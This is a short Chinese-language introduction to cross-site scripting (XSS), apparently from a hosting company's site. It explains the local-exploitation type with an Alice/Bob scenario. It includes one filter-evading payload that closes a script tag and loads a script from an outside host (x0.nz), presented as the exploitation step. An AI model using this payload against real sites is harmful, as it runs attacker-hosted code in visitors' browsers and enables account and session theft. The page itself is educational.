云计算服务
服务器租用
DDOS 防护
虚拟主机
域名服务
基础设施
关于我们
XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。网页在于用户互动的过程中存在用户构造特定指令来让网页执行非预定任务。这里有点sql注入的赶脚。
XSS漏洞按照利用手法的不同,有以下三种类型:
类型A,本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。其过程如下所示:
Alice给Bob发送一个恶意构造了Web的URL。
Bob点击并查看了这个URL。
恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在Bob电脑上。
具有漏洞的HTML页面包含了在Bob电脑本地域执行的JavaScript。
Alice的恶意脚本可以在Bob的电脑上执行Bob所持有的权限下的命令。
比如下述payload:
(aaa'"></ScRiPt><sCRiPt sRC=//x0.nz/us4z></sCrIpT>)
这里写出一个标记来实现插入链接的目的。前面 我们已经确认了此处已存在漏洞,那么这一步就是具体的来利用了。
跨站脚本初探:/news/upload/ueditor/image/202209/n3j51pcky1g.html
.png)
.png)
